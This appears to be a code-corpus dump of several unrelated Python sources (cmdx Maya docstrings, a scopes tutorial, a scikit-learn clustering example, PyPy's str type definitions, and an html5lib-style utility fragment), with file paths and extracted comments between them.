Example:
>>> _ = cmds.file(new=True, force=True)
>>> parent = createNode("transform", name="myParent")
>>> child = createNode("transform", name="myChild", parent=parent)
>>> child.shortestPath()
u'myChild'
>>> child = createNode("transform", name="myChild")
>>> # Now `myChild` could refer to more than a single node
>>> child.shortestPath()
u'|myChild'
Set visibility to True
Show attribute in channel box
Note: An attribute can be both visible in the channel box
and non-keyable, therefore, unlike :func:`hide()`, this
method does not alter the keyable state of the attribute.
Sort members of set by `key`
Arguments:
key (lambda): See built-in `sorted(key)` for reference
Whether or not to save this node with the file
Cache the given `mobj` and return its hashCode
This enables pre-caching of one or more nodes in situations where
you intend to access them later, at a more performance-critical moment.
Ignores nodes that have already been cached.
Cache the given `mobj` and return its hex value
See :func:`toHash` for docstring.
Return TransformationMatrix
This method does not typically support optional arguments
Convert twist/swing1/swing2 rotation in a Vector into a quaternion
Arguments:
ts (Vector): Twist, swing1 and swing2
Return type name
Example:
>>> node = createNode("choice")
>>> node.type()
u'choice'
Retrieve API type of plug as string
Example:
>>> node = createNode("transform")
>>> node["translate"].type()
'kAttribute3Double'
>>> node["translateX"].type()
'kDoubleLinearAttribute'
Return the native maya.api.MTypeId of this node
Example:
>>> node = createNode("transform")
>>> node.typeId == tTransform
True
Apply a series of attributes all at once
This operates similar to a Python dictionary.
Arguments:
attrs (dict): Key/value pairs of name and attribute
Examples:
>>> node = createNode("transform")
>>> node.update({"tx": 5.0, ("ry", Degrees): 30.0})
>>> node["tx"]
5.0
Add several `members` to set
Arguments:
members (list): Series of cmdx.Node instances
Append timing information to a function
Example:
@withTiming()
def function():
pass
Can the user write to this attribute?
Convenience for combined call to `plug.connected`
and `plug.locked`.
Example:
>> if node["translateX"].writable:
.. node["translateX"] = 5
-*- coding: utf-8 -*- Bypass assertion error on unsupported Maya versions Output profiling information to console CAREFUL! This will flood your console. Use sparingly. Do not perform any caching of nodes or plugs Increase performance by not protecting against fatal crashes (e.g. operations on deleted nodes) This can be useful when you know for certain that a series of operations will happen in isolation, such as during an auto rigging build or export process. Increase performance by not bothering to free up unused memory Support undo/redo Required E.g. Preview Release 95 Aliases - API 1.0 Aliases - API 2.0 Accessible via `cmdx.NodeReuseCount` etc. Node reuse depends on this member DEPRECATED Reusable objects, for performance Animation curve interpolation, from MFnAnimCurve::TangentType Do not wrap the function. This yields zero cost to runtime performance microseconds Spaces Angular units Distance units Time units For isinstance(x, _Cached) It didn't exist, let's create one But first, make sure we instantiate the right type Module-level cache of previously created instances of Node Better to ask forgivness than permission Convert value to the given unit Create a new attribute NOTE: I can't be sure this is the only occasion where this exception is thrown. Stay catious. Only a few attribute types are supported by a modifier Else, write it immediately Callbacks Monitor node deletion, to prevent accidental use of MObject past its lifetime which may result in a fatal crash. func clientData Alias How is this value queried? The original function is a double negative Module-level branch; evaluated on import Else it will return name as-is, as namespace E.g. Ryan_:leftHand -> Ryan_, but :leftHand -> leftHand Alias TODO: Support more types of attributes, such that this doesn't need to happen. Alias Shapes have no children TODO: Unsure of exactly when this happens Module-level expression; this isn't evaluated at run-time, for that extra performance boost. 
Support filtering by typeName Skip self Support filtering by typeName Skip self MFnTransform Limit Types The error provided by Maya aren't very descriptive, help a brother out by look for common problems. Python 3 E.g. node["t"] + "x" E.g. node["translate"] + "X" getExisting... returns indices currently in use, which is important if the given array is *sparse*. That is, if indexes 5, 7 and 8 are used. If we simply call `evaluateNumElements` then it'll return a single number we could use to `range()` from, but that would only work if the indices were contiguous. Facilitate single-value attributes Support backwards-indexing Compound attributes have no equivalent to "MDependencyNode.findPlug()" and must be searched by hand. Alias Use setAttr in place of MPlug.isKeyable = False, as that doesn't persist the scene on save if the attribute is dynamic. Use setAttr in place of MPlug.isChannelBox = False, as that doesn't persist the scene on save if the attribute is dynamic. Use setAttr in place of MPlug.isKeyable = False, as that doesn't persist the scene on save if the attribute is dynamic. Store cached value Expected errors Disconnect any plug connected to `other` Don't do it, leave that to the parent context It doesn't like being handed `None` A more intuitive alternative Alias Alias, it can't take anything other than values and yet it isn't explicit in its name. Alias Alias Multi attributes _____ | | | || | || |_____|| |_____| E.g. locator["worldPosition"] E.g. transform["worldMatrix"][0] E.g. locator["worldPosition"][0] Simple attributes _____ | | | | | | |_____| E.g. choice["input"][0] E.g. transform["worldMatrix"][0] E.g. time1.timewarpIn_Hidden Unsure of why some attributes are invalid Number Enum In order to comply with `if plug:` Compound values Tuple values are assumed flat: e.g. (0, 0, 0, 0) Nested values are not supported: e.g. ((0, 0), (0, 0)) Those can sometimes appear in e.g. matrices Native Maya types Native Python types Tuple values are assumed flat: e.g. 
(0, 0, 0, 0) Nested values are not supported: e.g. ((0, 0), (0, 0)) Those can sometimes appear in e.g. matrices Helpful for euler rotations Don't store actual objects, to facilitate garbage collection. Support calling `doIt` during a context, without polluting the undo queue. Rollback changes Disconnect any plug connected to `other` Disconnect any plug connected to `other` Alias Support legacy maya.cmds interface PEP08 Speciality functions Superimpose end knots startpoints = [points[0]] * (degree - 1) endpoints = [points[-1]] * (degree - 1) points = startpoints + list(points) + endpoints -------------------------------------------------------- Attribute Types -------------------------------------------------------- Cache in datablock? Write value to file? Display in Attribute Editor? Support Attribute -> Attribute comparison Support Attribute -> string comparison Exclusive to numeric attributes Filled in on creation MyName -> myName 3 μs Identity matrix Support single-value default When no unit was explicitly passed, assume degrees When no unit was explicitly passed, assume seconds When no unit was explicitly passed, assume centimeters Compound itself has no defaults, only it's children do Forward attributes from parent to child Convenience aliases, for when it isn't clear e.g. `Matrix()` is referring to an attribute rather than the datatype. -------------------------------------------------------- Undo/Redo Support NOTE: Localised version of apiundo.py 0.2.0 https://github.com/mottosso/apiundo In Maya, history is maintained by "commands". Each command is an instance of MPxCommand that encapsulates a series of API calls coupled with their equivalent undo/redo API calls. For example, the `createNode` command is presumably coupled with `cmds.delete`, `setAttr` is presumably coupled with another `setAttr` with the previous values passed in. 
Thus, creating a custom command involves subclassing MPxCommand and implementing coupling your do, undo and redo into one neat package. cmdx however doesn't fit into this framework. With cmdx, you call upon API calls directly. There is little to no correlation between each of your calls, which is great for performance but not so great for conforming to the undo/redo framework set forth by Autodesk. To work around this, without losing out on performance or functionality, a generic command is created, capable of hosting arbitrary API calls and storing them in the Undo/Redo framework. >>> node = cmdx.createNode("transform") >>> cmdx.commit(lambda: cmdx.delete(node)) Now when you go to undo, the `lambda` is called. It is then up to you the developer to ensure that what is being undone actually relates to what you wanted to have undone. For example, it is perfectly possible to add an unrelated call to history. >>> node = cmdx.createNode("transform") >>> cmdx.commit(lambda: cmdx.setAttr(node + "translateX", 5)) The result would be setting an attribute to `5` when attempting to undo. -------------------------------------------------------- Support for multiple co-existing versions of apiundo. NOTE: This is important for vendoring, as otherwise a vendored apiundo could register e.g. cmds.apiUndo() first, causing a newer version to inadvertently use this older command (or worse yet, throwing an error when trying to register it again). This module is both a Python module and Maya plug-in. Data is shared amongst the two through this "module" Precautionary measure. If this doesn't pass, odds are we've got a race condition. NOTE: This assumes calls to `commit` can only be done from a single thread, which should already be the case given that Maya's API is not threadsafe. Temporarily store the functions at shared-level, they are later picked up by the command once called. 
Let Maya know that something is undoable Plug-in may exist in undo queue and therefore cannot be unloaded until flushed. Discard shared module Facilitate the above precautionary measure Without this, the above undoIt and redoIt will not be called -------------------------------------------------------- Commonly Node Types Creating a new node using a pre-defined Type ID is 10% faster than doing it using a string, but keeping all (~800) around has a negative impact on maintainability and readability of the project, so a balance is struck where only the most performance sensitive types are included here. Developers: See cmdt.py for a list of all available types and their IDs -------------------------------------------------------- -------------------------------------------------------- Plug-ins -------------------------------------------------------- Get your unique ID from Autodesk, the below should not be trusted for production. Support Divider plug-in, without name for readability. E.g. Divider("_", "Label") -> Divider("Label") Ensure no duplicates Maintain reference to original class Plugins written with Maya Python API 1.0 NOTE(marcus): The name *must* end with Manip See https://download.autodesk.com/us/maya/2011help /API/class_m_px_manip_container.html e95527ff30ae53c8ae0419a1abde8b0c -------------------------- Callback Manager -------------------------- Callbacks are all uninstalled using the same function relative either API 1.0 or 2.0 ---------------------- Cache Manager ---------------------- Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the License for the specific language governing permissions and limitations under the License. | 51,399 | en | 0.639026 |
""" Global and local Scopes
Scopes and Namespaces
When an object is assigned to a variable # a = 10
that variable points to some object
and we say that the variable (name) is bound to that object
That object can be accessed using that name in various parts of our code
# ### I can't reference that (a) just anywhere in my code!
That variable name and its binding (name and object) only "exist" in specific parts of our code
The portion of code where that name/binding is defined is called the lexical scope of the variable
These bindings are stored in namespaces
(each scope has its own namespace)
The global scope
The global scope is essentially the module scope
It spans a single file only
There is no concept of a truly global (across all the modules in our app) scope in Python
The only exception to this are some of the built-in globally available objects, such as:
True False None dict print
The built-in global variables can be used anywhere inside our module
including inside any function
Global scopes are nested inside the built-in scope
Built-in Scope
Module 1 name spaces
Scope name var1 0xA345E
space func1 0xFF34A
Module 2
Scope name
space
If I reference a variable name inside a scope and Python does not find it in that scope's namespace
Examples
module1.py Python does not find True or print in the current (module/global) scope
print(True) So, it looks for them in the enclosing scope -> build-in
Finds them there -> True
module2.py Python does not find a or print in the current (module/global) scope
print(a) So
""" | .history/my_classes/ScopesClosuresAndDecorators/GlobalLocalScopes_20210709212514.py | 1,931 | Global and local Scopes
Scopes and Namespaces
When an object is assigned to a variable # a = 10
that variable points to some object
and we say that the variable (name) is bound to that object
That object can be accessed using that name in various parts of our code
# ### I can't reference that (a) just anywhere in my code!
That variable name and it's binding (name and object) only "exist" in specific parts of our code
The porton of code where that name/binding is defined, is called the lexical scope of the variable
These bindings are stored in namespaces
(each scope has its own namespace)
The global scope
The global scope is essentially the module scope
It spans a single file only
There is no concept of a truly global (across all the modules in our app) scope in Python
The only exception to this are some of the built=in globally available objects, such as:
True False None dict print
The built-in global variables can be used anywhere inside our module
including inside any function
Global scopes are nested inside the built-in scope
Built-in Scope
Module 1 name spaces
Scope name var1 0xA345E
space func1 0xFF34A
Module 2
Scope name
space
If I reference a variable name inside a scope and Python does ot find it in that scope's namespace
Examples
module1.py Python does not find True or print in the current (module/global) scope
print(True) So, it looks for them in the enclosing scope -> build-in
Finds them there -> True
module2.py Python does not find a or print in the current (module/global) scope
print(a) So | 1,902 | en | 0.852117 |
"""
=============================================================================
Various Agglomerative Clustering on a 2D embedding of digits
=============================================================================
An illustration of various linkage options for agglomerative clustering on
a 2D embedding of the digits dataset.
The goal of this example is to show intuitively how the metrics behave, and
not to find good clusters for the digits. This is why the example works on a
2D embedding.
What this example shows us is the behavior "rich getting richer" of
agglomerative clustering that tends to create uneven cluster sizes.
This behavior is pronounced for the average linkage strategy,
that ends up with a couple of singleton clusters, while in the case
of single linkage we get a single central cluster with all other clusters
being drawn from noise points around the fringes.
"""
# Authors: Gael Varoquaux
# License: BSD 3 clause (C) INRIA 2014
print(__doc__)
from time import time
import numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt
from sklearn import manifold, datasets
# Load the digits dataset: each row is an 8x8 pixel image flattened
# to 64 features (nudge_images below reshapes rows back to (8, 8)).
X, y = datasets.load_digits(return_X_y=True)
n_samples, n_features = X.shape
# Fixed seed so the random image nudges in nudge_images are reproducible.
np.random.seed(0)
def nudge_images(X, y):
    """Double the dataset by appending randomly shifted copies of each image.

    A larger dataset shows the behavior of the clustering methods more
    clearly, but the size is only multiplied by 2 because the cost of
    the hierarchical clustering methods is strongly super-linear in
    n_samples.
    """
    def random_shift(flat_image):
        # Reshape the 64-vector to its 8x8 image, translate it by a
        # small random offset, then flatten it back.
        offset = .3 * np.random.normal(size=2)
        return ndimage.shift(flat_image.reshape((8, 8)),
                             offset,
                             mode='constant').ravel()

    shifted = np.apply_along_axis(random_shift, 1, X)
    X = np.concatenate([X, shifted])
    Y = np.concatenate([y, y], axis=0)
    return X, Y
X, y = nudge_images(X, y)
#----------------------------------------------------------------------
# Visualize the clustering
def plot_clustering(X_red, labels, title=None):
    """Draw each sample as its digit over the 2D embedding.

    Each point of `X_red` is rendered as the digit character taken
    from the module-level `y`, tinted by its cluster label.

    Arguments:
        X_red (ndarray): 2D embedding of the samples, shape (n, 2)
        labels (ndarray): Cluster label per sample
        title (str, optional): Figure title, omitted when None
    """
    # Rescale the embedding to the unit square so the text placement
    # is independent of the embedding's original extent.
    lower, upper = np.min(X_red, axis=0), np.max(X_red, axis=0)
    X_red = (X_red - lower) / (upper - lower)

    plt.figure(figsize=(6, 4))
    for idx, (px, py) in enumerate(X_red):
        plt.text(px, py, str(y[idx]),
                 color=plt.cm.nipy_spectral(labels[idx] / 10.),
                 fontdict={'weight': 'bold', 'size': 9})

    plt.xticks([])
    plt.yticks([])
    if title is not None:
        plt.title(title, size=17)
    plt.axis('off')
    plt.tight_layout(rect=[0, 0.03, 1, 0.95])
#----------------------------------------------------------------------
# 2D embedding of the digits dataset
print("Computing embedding")
# Project the 64-dimensional digit vectors onto 2D with a spectral
# embedding; all linkage strategies are compared on this same embedding.
X_red = manifold.SpectralEmbedding(n_components=2).fit_transform(X)
print("Done.")
from sklearn.cluster import AgglomerativeClustering
# Fit one agglomerative model per linkage strategy, timing only the
# fit itself (not the plotting), then visualize the resulting labels.
for linkage in ('ward', 'average', 'complete', 'single'):
    clustering = AgglomerativeClustering(linkage=linkage, n_clusters=10)
    t0 = time()
    clustering.fit(X_red)
    print("%s :\t%.2fs" % (linkage, time() - t0))
    plot_clustering(X_red, clustering.labels_, "%s linkage" % linkage)
plt.show()
| examples/cluster/plot_digits_linkage.py | 3,092 | =============================================================================
Various Agglomerative Clustering on a 2D embedding of digits
=============================================================================
An illustration of various linkage options for agglomerative clustering on
a 2D embedding of the digits dataset.
The goal of this example is to show intuitively how the metrics behave, and
not to find good clusters for the digits. This is why the example works on a
2D embedding.
What this example shows us is the behavior "rich getting richer" of
agglomerative clustering that tends to create uneven cluster sizes.
This behavior is pronounced for the average linkage strategy,
that ends up with a couple of singleton clusters, while in the case
of single linkage we get a single central cluster with all other clusters
being drawn from noise points around the fringes.
Authors: Gael Varoquaux License: BSD 3 clause (C) INRIA 2014 Having a larger dataset shows more clearly the behavior of the methods, but we multiply the size of the dataset only by 2, as the cost of the hierarchical clustering methods are strongly super-linear in n_samples---------------------------------------------------------------------- Visualize the clustering---------------------------------------------------------------------- 2D embedding of the digits dataset | 1,364 | en | 0.755457 |
from pypy.objspace.std.stdtypedef import *
from pypy.objspace.std.basestringtype import basestring_typedef
from sys import maxint
from pypy.rlib.objectmodel import specialize
def wrapstr(space, s):
    """Wrap the interp-level string ``s`` as an app-level str object.

    Depending on the object-space configuration this may reuse a shared
    prebuilt object (the empty string, single characters) or build a
    rope-based object instead of a plain W_StringObject.
    """
    from pypy.objspace.std.stringobject import W_StringObject
    from pypy.objspace.std.ropeobject import rope, W_RopeObject
    if space.config.objspace.std.sharesmallstr:
        if len(s) == 0:
            # both sharing modes reuse the single prebuilt empty string
            if space.config.objspace.std.withrope:
                return W_RopeObject.EMPTY
            return W_StringObject.EMPTY
        if space.config.objspace.std.withprebuiltchar and len(s) == 1:
            # share characters too
            s = s[0]     # annotator hint: a single char
            return wrapchar(space, s)
    if space.config.objspace.std.withrope:
        return W_RopeObject(rope.LiteralStringNode(s))
    return W_StringObject(s)
def wrapchar(space, c):
    """Wrap a single character ``c``, sharing prebuilt objects if enabled."""
    from pypy.objspace.std.stringobject import W_StringObject
    from pypy.objspace.std.ropeobject import rope, W_RopeObject
    if not space.config.objspace.std.withprebuiltchar:
        if space.config.objspace.std.withrope:
            return W_RopeObject(rope.LiteralStringNode(c))
        return W_StringObject(c)
    # one shared prebuilt object per possible byte value
    if space.config.objspace.std.withrope:
        return W_RopeObject.PREBUILT[ord(c)]
    return W_StringObject.PREBUILT[ord(c)]
def sliced(space, s, start, stop, orig_obj):
    """Return a wrapped substring s[start:stop].

    May return ``orig_obj`` itself when the slice covers the whole string
    and the object is exactly a str, or a lazy W_StringSliceObject for
    slices large enough to make laziness worthwhile.
    """
    assert start >= 0
    assert stop >= 0
    assert not space.config.objspace.std.withrope
    covers_all = start == 0 and stop == len(s)
    if covers_all and space.is_w(space.type(orig_obj), space.w_str):
        return orig_obj
    if space.config.objspace.std.withstrslice:
        from pypy.objspace.std.strsliceobject import W_StringSliceObject
        # XXX heuristic, should be improved!
        if (stop - start) > len(s) * 0.20 + 40:
            return W_StringSliceObject(s, start, stop)
    return wrapstr(space, s[start:stop])
def joined(space, strlist):
    """Join a list of interp-level strings into one wrapped string.

    With ``withstrjoin`` enabled the join is performed lazily.
    """
    assert not space.config.objspace.std.withrope
    if not space.config.objspace.std.withstrjoin:
        return wrapstr(space, "".join(strlist))
    from pypy.objspace.std.strjoinobject import W_StringJoinObject
    return W_StringJoinObject(strlist)
def joined2(space, str1, str2):
    """Concatenate two interp-level strings into one wrapped string.

    With ``withstrjoin`` enabled the concatenation is performed lazily.
    """
    assert not space.config.objspace.std.withrope
    if not space.config.objspace.std.withstrjoin:
        return wrapstr(space, str1 + str2)
    from pypy.objspace.std.strjoinobject import W_StringJoinObject
    return W_StringJoinObject([str1, str2])
# Multimethod declarations for the app-level 'str' methods.  Each SMM
# records the method name, its arity (including the receiver), optional
# argument defaults, and the app-level docstring; the implementations
# are attached later via str_typedef.registermethods(globals()).
str_join = SMM('join', 2,
               doc='S.join(sequence) -> string\n\nReturn a string which is'
                   ' the concatenation of the strings in the\nsequence. '
                   ' The separator between elements is S.')
str_split = SMM('split', 3, defaults=(None,-1),
                doc='S.split([sep [,maxsplit]]) -> list of strings\n\nReturn'
                    ' a list of the words in the string S, using sep as'
                    ' the\ndelimiter string. If maxsplit is given, at most'
                    ' maxsplit\nsplits are done. If sep is not specified or'
                    ' is None, any\nwhitespace string is a separator.')
str_rsplit = SMM('rsplit', 3, defaults=(None,-1),
                 doc='S.rsplit([sep [,maxsplit]]) -> list of'
                     ' strings\n\nReturn a list of the words in the string S,'
                     ' using sep as the\ndelimiter string, starting at the'
                     ' end of the string and working\nto the front. If'
                     ' maxsplit is given, at most maxsplit splits are\ndone.'
                     ' If sep is not specified or is None, any whitespace'
                     ' string\nis a separator.')
str_isdigit    = SMM('isdigit', 1,
                     doc='S.isdigit() -> bool\n\nReturn True if all characters'
                         ' in S are digits\nand there is at least one'
                         ' character in S, False otherwise.')
str_isalpha    = SMM('isalpha', 1,
                     doc='S.isalpha() -> bool\n\nReturn True if all characters'
                         ' in S are alphabetic\nand there is at least one'
                         ' character in S, False otherwise.')
str_isspace    = SMM('isspace', 1,
                     doc='S.isspace() -> bool\n\nReturn True if all characters'
                         ' in S are whitespace\nand there is at least one'
                         ' character in S, False otherwise.')
str_isupper    = SMM('isupper', 1,
                     doc='S.isupper() -> bool\n\nReturn True if all cased'
                         ' characters in S are uppercase and there is\nat'
                         ' least one cased character in S, False otherwise.')
str_islower    = SMM('islower', 1,
                     doc='S.islower() -> bool\n\nReturn True if all cased'
                         ' characters in S are lowercase and there is\nat'
                         ' least one cased character in S, False otherwise.')
str_istitle    = SMM('istitle', 1,
                     doc='S.istitle() -> bool\n\nReturn True if S is a'
                         ' titlecased string and there is at least'
                         ' one\ncharacter in S, i.e. uppercase characters may'
                         ' only follow uncased\ncharacters and lowercase'
                         ' characters only cased ones. Return'
                         ' False\notherwise.')
str_isalnum    = SMM('isalnum', 1,
                     doc='S.isalnum() -> bool\n\nReturn True if all characters'
                         ' in S are alphanumeric\nand there is at least one'
                         ' character in S, False otherwise.')
str_ljust      = SMM('ljust', 3, defaults=(' ',),
                     doc='S.ljust(width[, fillchar]) -> string\n\nReturn S'
                         ' left justified in a string of length width. Padding'
                         ' is\ndone using the specified fill character'
                         ' (default is a space).')
str_rjust      = SMM('rjust', 3, defaults=(' ',),
                     doc='S.rjust(width[, fillchar]) -> string\n\nReturn S'
                         ' right justified in a string of length width.'
                         ' Padding is\ndone using the specified fill character'
                         ' (default is a space)')
str_upper      = SMM('upper', 1,
                     doc='S.upper() -> string\n\nReturn a copy of the string S'
                         ' converted to uppercase.')
str_lower      = SMM('lower', 1,
                     doc='S.lower() -> string\n\nReturn a copy of the string S'
                         ' converted to lowercase.')
str_swapcase   = SMM('swapcase', 1,
                     doc='S.swapcase() -> string\n\nReturn a copy of the'
                         ' string S with uppercase characters\nconverted to'
                         ' lowercase and vice versa.')
str_capitalize = SMM('capitalize', 1,
                     doc='S.capitalize() -> string\n\nReturn a copy of the'
                         ' string S with only its first'
                         ' character\ncapitalized.')
str_title      = SMM('title', 1,
                     doc='S.title() -> string\n\nReturn a titlecased version'
                         ' of S, i.e. words start with uppercase\ncharacters,'
                         ' all remaining cased characters have lowercase.')
str_find       = SMM('find', 4, defaults=(0, maxint),
                     doc='S.find(sub [,start [,end]]) -> int\n\nReturn the'
                         ' lowest index in S where substring sub is'
                         ' found,\nsuch that sub is contained within'
                         ' s[start,end]. Optional\narguments start and end'
                         ' are interpreted as in slice notation.\n\nReturn -1'
                         ' on failure.')
str_rfind      = SMM('rfind', 4, defaults=(0, maxint),
                     doc='S.rfind(sub [,start [,end]]) -> int\n\nReturn the'
                         ' highest index in S where substring sub is'
                         ' found,\nsuch that sub is contained within'
                         ' s[start,end]. Optional\narguments start and end'
                         ' are interpreted as in slice notation.\n\nReturn -1'
                         ' on failure.')
str_partition  = SMM('partition', 2,
                     doc='S.partition(sep) -> (head, sep, tail)\n\nSearches'
                         ' for the separator sep in S, and returns the part before'
                         ' it,\nthe separator itself, and the part after it. If'
                         ' the separator is not\nfound, returns S and two empty'
                         ' strings.')
str_rpartition = SMM('rpartition', 2,
                     doc='S.rpartition(sep) -> (tail, sep, head)\n\nSearches'
                         ' for the separator sep in S, starting at the end of S,'
                         ' and returns\nthe part before it, the separator itself,'
                         ' and the part after it. If the\nseparator is not found,'
                         ' returns two empty strings and S.')
str_index      = SMM('index', 4, defaults=(0, maxint),
                     doc='S.index(sub [,start [,end]]) -> int\n\nLike S.find()'
                         ' but raise ValueError when the substring is not'
                         ' found.')
str_rindex     = SMM('rindex', 4, defaults=(0, maxint),
                     doc='S.rindex(sub [,start [,end]]) -> int\n\nLike'
                         ' S.rfind() but raise ValueError when the substring'
                         ' is not found.')
str_replace    = SMM('replace', 4, defaults=(-1,),
                     doc='S.replace (old, new[, count]) -> string\n\nReturn a'
                         ' copy of string S with all occurrences of'
                         ' substring\nold replaced by new. If the optional'
                         ' argument count is\ngiven, only the first count'
                         ' occurrences are replaced.')
str_zfill      = SMM('zfill', 2,
                     doc='S.zfill(width) -> string\n\nPad a numeric string S'
                         ' with zeros on the left, to fill a field\nof the'
                         ' specified width. The string S is never truncated.')
str_strip      = SMM('strip', 2, defaults=(None,),
                     doc='S.strip([chars]) -> string or unicode\n\nReturn a'
                         ' copy of the string S with leading and'
                         ' trailing\nwhitespace removed.\nIf chars is given'
                         ' and not None, remove characters in chars'
                         ' instead.\nIf chars is unicode, S will be converted'
                         ' to unicode before stripping')
str_rstrip     = SMM('rstrip', 2, defaults=(None,),
                     doc='S.rstrip([chars]) -> string or unicode\n\nReturn a'
                         ' copy of the string S with trailing whitespace'
                         ' removed.\nIf chars is given and not None, remove'
                         ' characters in chars instead.\nIf chars is unicode,'
                         ' S will be converted to unicode before stripping')
str_lstrip     = SMM('lstrip', 2, defaults=(None,),
                     doc='S.lstrip([chars]) -> string or unicode\n\nReturn a'
                         ' copy of the string S with leading whitespace'
                         ' removed.\nIf chars is given and not None, remove'
                         ' characters in chars instead.\nIf chars is unicode,'
                         ' S will be converted to unicode before stripping')
str_center     = SMM('center', 3, defaults=(' ',),
                     doc='S.center(width[, fillchar]) -> string\n\nReturn S'
                         ' centered in a string of length width. Padding'
                         ' is\ndone using the specified fill character'
                         ' (default is a space)')
str_count      = SMM('count', 4, defaults=(0, maxint),
                     doc='S.count(sub[, start[, end]]) -> int\n\nReturn the'
                         ' number of occurrences of substring sub in'
                         ' string\nS[start:end]. Optional arguments start and'
                         ' end are\ninterpreted as in slice notation.')
str_endswith   = SMM('endswith', 4, defaults=(0, maxint),
                     doc='S.endswith(suffix[, start[, end]]) -> bool\n\nReturn'
                         ' True if S ends with the specified suffix, False'
                         ' otherwise.\nWith optional start, test S beginning'
                         ' at that position.\nWith optional end, stop'
                         ' comparing S at that position.')
str_expandtabs = SMM('expandtabs', 2, defaults=(8,),
                     doc='S.expandtabs([tabsize]) -> string\n\nReturn a copy'
                         ' of S where all tab characters are expanded using'
                         ' spaces.\nIf tabsize is not given, a tab size of 8'
                         ' characters is assumed.')
str_splitlines = SMM('splitlines', 2, defaults=(0,),
                     doc='S.splitlines([keepends]) -> list of'
                         ' strings\n\nReturn a list of the lines in S,'
                         ' breaking at line boundaries.\nLine breaks are not'
                         ' included in the resulting list unless keepends\nis'
                         ' given and true.')
str_startswith = SMM('startswith', 4, defaults=(0, maxint),
                     doc='S.startswith(prefix[, start[, end]]) ->'
                         ' bool\n\nReturn True if S starts with the specified'
                         ' prefix, False otherwise.\nWith optional start, test'
                         ' S beginning at that position.\nWith optional end,'
                         ' stop comparing S at that position.')
str_translate  = SMM('translate', 3, defaults=('',), #unicode mimic not supported now
                     doc='S.translate(table [,deletechars]) -> string\n\n'
                         'Return a copy of the string S, where all characters'
                         ' occurring\nin the optional argument deletechars are'
                         ' removed, and the\nremaining characters have been'
                         ' mapped through the given\ntranslation table, which'
                         ' must be a string of length 256.')
str_decode     = SMM('decode', 3, defaults=(None, None),
                     doc='S.decode([encoding[,errors]]) -> object\n\nDecodes S'
                         ' using the codec registered for encoding. encoding'
                         ' defaults\nto the default encoding. errors may be'
                         ' given to set a different error\nhandling scheme.'
                         " Default is 'strict' meaning that encoding errors"
                         ' raise\na UnicodeDecodeError. Other possible values'
                         " are 'ignore' and 'replace'\nas well as any other"
                         ' name registerd with codecs.register_error that'
                         ' is\nable to handle UnicodeDecodeErrors.')
str_encode     = SMM('encode', 3, defaults=(None, None),
                     doc='S.encode([encoding[,errors]]) -> object\n\nEncodes S'
                         ' using the codec registered for encoding. encoding'
                         ' defaults\nto the default encoding. errors may be'
                         ' given to set a different error\nhandling scheme.'
                         " Default is 'strict' meaning that encoding errors"
                         ' raise\na UnicodeEncodeError. Other possible values'
                         " are 'ignore', 'replace' and\n'xmlcharrefreplace' as"
                         ' well as any other name registered'
                         ' with\ncodecs.register_error that is able to handle'
                         ' UnicodeEncodeErrors.')
# ____________________________________________________________
def descr__new__(space, w_stringtype, w_object=''):
    # NB. the default value of w_object is really a *wrapped* empty string:
    # there is gateway magic at work
    from pypy.objspace.std.stringobject import W_StringObject
    w_obj = space.str(w_object)
    if space.is_w(w_stringtype, space.w_str):
        # plain 'str' requested: the result of space.str() is already it
        return w_obj  # XXX might be reworked when space.str() typechecks
    value = space.str_w(w_obj)
    if not space.config.objspace.std.withrope:
        w_result = space.allocate_instance(W_StringObject, w_stringtype)
        W_StringObject.__init__(w_result, value)
        return w_result
    from pypy.objspace.std.ropeobject import rope, W_RopeObject
    w_result = space.allocate_instance(W_RopeObject, w_stringtype)
    W_RopeObject.__init__(w_result, rope.LiteralStringNode(value))
    return w_result
# ____________________________________________________________
str_typedef = StdTypeDef("str", basestring_typedef,
__new__ = newmethod(descr__new__),
__doc__ = '''str(object) -> string
Return a nice string representation of the object.
If the argument is a string, the return value is the same object.'''
)
str_typedef.custom_hash = True
str_typedef.registermethods(globals())
# ____________________________________________________________
# Helpers for several string implementations
@specialize.argtype(0)
def stringendswith(u_self, suffix, start, end):
    """Return True if u_self[start:end] ends with ``suffix``."""
    n = len(suffix)
    begin = end - n
    # the suffix window must not reach before 'start'
    if begin < start:
        return False
    i = 0
    while i < n:
        if u_self[begin + i] != suffix[i]:
            return False
        i += 1
    return True
@specialize.argtype(0)
def stringstartswith(u_self, prefix, start, end):
    """Return True if u_self[start:end] starts with ``prefix``."""
    n = len(prefix)
    # the prefix window must not reach beyond 'end'
    if start + n > end:
        return False
    i = 0
    while i < n:
        if u_self[start + i] != prefix[i]:
            return False
        i += 1
    return True
| pypy/objspace/std/stringtype.py | 18,300 | share characters and empty string annotator hint: a single char only share the empty string XXX heuristic, should be improved!unicode mimic not supported now ____________________________________________________________ NB. the default value of w_object is really a *wrapped* empty string: there is gateway magic at work XXX might be reworked when space.str() typechecks ____________________________________________________________ ____________________________________________________________ Helpers for several string implementations | 538 | en | 0.566113 |
from __future__ import absolute_import
from types import ModuleType
class MethodDispatcher(dict):
    u"""Dictionary with two extra behaviors.

    1. Keys that are lists, tuples, sets or frozensets are expanded on
       construction, so every member of the original collection maps to
       the same value:

       md = MethodDispatcher([(("foo", "bar"), "baz")])
       md["foo"] == "baz"

    2. Lookups of unknown keys return ``self.default`` (initially None)
       instead of raising KeyError.
    """
    def __init__(self, items=()):
        # Building a flat entry list and handing it to dict.__init__ in
        # a single call is about twice as fast as assigning into self;
        # please benchmark before changing this.
        entries = []
        for key, value in items:
            if type(key) in (list, tuple, frozenset, set):
                for member in key:
                    entries.append((member, value))
            else:
                entries.append((key, value))
        dict.__init__(self, entries)
        self.default = None
    __init__.func_annotations = {}

    def __getitem__(self, key):
        # fall back to the configurable default instead of raising
        return dict.get(self, key, self.default)
    __getitem__.func_annotations = {}
#Some utility functions to deal with weirdness around UCS2 vs UCS4
#python builds
def encodingType():
    u"""Return u"UCS2" or u"UCS4" depending on how this Python build
    stores astral (non-BMP) characters.

    On narrow (UCS2) builds a character above U+FFFF is stored as a
    surrogate pair, so its length is 2; on wide (UCS4) builds it is a
    single code point.
    """
    # Bug fix: the original called len() with no argument, which raises
    # TypeError unconditionally.  The astral-character probe below is
